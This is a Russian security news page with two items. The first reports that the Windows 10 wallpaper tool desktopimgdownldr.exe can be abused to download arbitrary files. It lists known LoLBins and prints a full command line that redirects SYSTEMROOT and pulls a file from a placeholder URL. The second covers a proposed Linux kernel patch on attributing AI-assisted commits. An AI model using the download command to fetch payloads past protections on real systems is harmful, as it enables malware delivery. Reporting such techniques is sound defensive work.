Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Исполняемые системные файлы Windows 10, отвечающие за установку фона рабочего стола и экрана блокировки, могут посодействовать злоумышленникам — с их помощью атакующий может загрузить на компьютер вредоносную программу в обход средств защиты.

Эти файлы известны под именем LoLBins (living-of-the-land binaries), они идут в комплекте с каждой версией ОС и служат вполне определённым безобидным целям. Однако киберпреступники могут использовать LoLBins на заключительном этапе своей атаки, чтобы скрыть вредоносную активность в системе.

Например, условный атакующий может задействовать LoLBins для загрузки и установки вредоносной программы, которая успешно обойдёт защитные механизмы Windows — контроль учётных записей пользователей (UAC) и политики WDAC.

В прошлом году эксперты Cisco Talos опубликовали список из 13 системных исполняемых файлов Windows, которые могут в теории загрузить и выполнить вредоносный код:

  • powershell.exe
  • bitsadmin.exe
  • certutil.exe
  • psexec.exe
  • wmic.exe
  • mshta.exe
  • mofcomp.exe
  • cmstp.exe
  • windbg.exe
  • cdb.exe
  • msbuild.exe
  • csc.exe
  • regsvr32.exe

Теперь к изучению проблемы подключились исследователи из SentinelOne. Они обнаружили, что desktopimgdownldr.exe (располагается в системной директории system32) также может послужить в качестве LoLBin.

Задача файла desktopimgdownldr.exe в Windows проста — устанавливать фон рабочего стола или экрана блокировки. По сути, это компонент всего механизма, отвечающего за персонализацию ОС.

Настройки функции установки фона рабочего стола допускают файлы в форматах JPG, JPEG, PNG. Как правило, файл desktopimgdownldr.exe работает с привилегиями администратора, однако команда SentinelOne выяснила, что этот компонент можно запустить с правами обычного пользователя для загрузки файлов из внешнего источника.

Если злоумышленник поменяет переменную среды %systemroot%, он сможет изменить директорию для загрузки произвольного файла и обойти средства защиты операционной системы:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

ИИ-инструменты могут получить статус соавтора в разработке ядра Linux

Разработчик из Nvidia Саша Левин предложил патч-серию, которая может сделать ИИ-ассистентов вроде Copilot, Claude или Cursor полноценной частью процесса разработки Linux-ядра — но по строго заданным правилам.

Во-первых, патч добавляет конфигурационные заготовки (stubs) для популярных ИИ-инструментов: GitHub Copilot, Claude, Codeium, Cursor, Continue, Windsurf, Aider и других. Все они будут ссылаться на единый файл с документацией — чтобы было ясно, как именно такие помощники могут быть задействованы.

Во-вторых — и это важнее — вводятся официальные правила, по которым в ядре можно использовать ИИ при написании кода. Главное требование: если ИИ что-то помог написать, в коммите нужно указывать это явно — с помощью строки Co-developed-by:. Пример:

Co-developed-by: Claude <claude-opus-4-20250514> 

А вот Signed-off-by: использовать для ИИ нельзя. Эта строка юридически означает следующее: человек подтверждает, что имеет право внести изменение и соблюдает лицензии — и такую ответственность может нести только живой разработчик.

В примере, приведённом в патче, Claude помог поправить опечатку в документации по OPP: вместо "dont" стало "don't". Вроде мелочь, но теперь с правильной атрибуцией.

Левин также предлагает создать новый раздел Documentation/AI/ в кодовой базе ядра. Там — чёткие инструкции:

  • Следовать стандартам кодирования Linux.
  • Уважать существующий процесс разработки.
  • Понимать лицензионные требования.

Отдельно подчёркивается: у ИИ бывают проблемы с пониманием этих аспектов, поэтому человеческий контроль обязателен.

Очевидно, ИИ-инструменты всё активнее используются даже в таких серьёзных проектах, как Linux-ядро. Патч Левина — попытка легализовать и структурировать этот процесс, не жертвуя качеством и юридической чистотой.

Так что, если вы уже тайком пользовались Copilot для фиксов в ядре, — теперь будет шанс делать это открыто, но по правилам.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru